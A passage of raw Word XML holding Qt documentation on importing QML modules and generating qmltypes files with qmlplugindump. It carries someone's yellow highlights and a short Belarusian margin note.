        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId302" w:history="1">
        <w:r w:rsidRPr="002C2AE0">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript resource</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which is only available if version 2.0 or greater of the module is imported, accessible via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MathFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifier.</w:t>
      </w:r>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If the module is</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId303" w:history="1">
        <w:r w:rsidRPr="00932347">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>installed</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML import path</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, clients could import and use the module in the following manner:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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ExampleModule</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.1</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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width</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>400</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height</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>400</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color</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"lightsteelblue"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CustomButton</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color</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"gray"</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text</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"Click Me!"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onClicked</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MathFunctions</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generateRandom</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&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</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color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"red"</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color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"gray"</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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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CustomButton</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type used above would come from the definition specified in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CustomButton21.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file, and the JavaScript resource identified by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MathFunctions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identifier would be defined in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mathfuncs.js</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="00522BA5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="writing-a-qmltypes-file"/>
      <w:bookmarkStart w:id="365" w:name="_Toc483000609"/>
      <w:bookmarkStart w:id="366" w:name="_Toc483003626"/>
      <w:bookmarkStart w:id="367" w:name="_Toc483603962"/>
      <w:bookmarkStart w:id="368" w:name="_Toc483605182"/>
      <w:bookmarkEnd w:id="364"/>
      <w:r w:rsidRPr="00522BA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Writing a qmltypes File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:bookmarkEnd w:id="366"/>
      <w:bookmarkEnd w:id="367"/>
      <w:bookmarkEnd w:id="368"/>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML modules may refer to one or more </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type information files</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in their</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qmldir</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file. These usually have the</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w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmltypes</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">extension and </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are read by external tools</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain information about types defined in plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As such qmltypes files </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have no effect on the functionality of a QML module</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Their only use is to allow tools such as Qt Creator </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to provide code completion</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>error checking</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and other functionality to users of your module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2AE0" w:rsidRPr="002C2AE0" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any module that uses plugins should also ship a type description file.</w:t>
      </w:r>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2C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The best way to create a qmltypes file for your module is to generate it using the</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qmlplugindump</w:t>
      </w:r>
      <w:r w:rsidRPr="00932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is provided with Qt.</w:t>
      </w:r>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932347">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: If your module is in</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/tmp/imports/My/Module</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, you could run</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Style w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">qmlplugindump </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</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tmp</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imports </w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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/tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imports</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>My</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Module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mymodule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qmltypes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E214C" w:rsidRDefault="002C2AE0" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C2AE0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to generate type information for your module. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E214C" w:rsidRPr="009127BC" w:rsidRDefault="003E214C" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB439E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="009127BC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>у мяне нешта згенерыравалася пасля вось гэтага радка:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009127BC" w:rsidRPr="009127BC" w:rsidRDefault="009127BC" w:rsidP="002C2AE0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
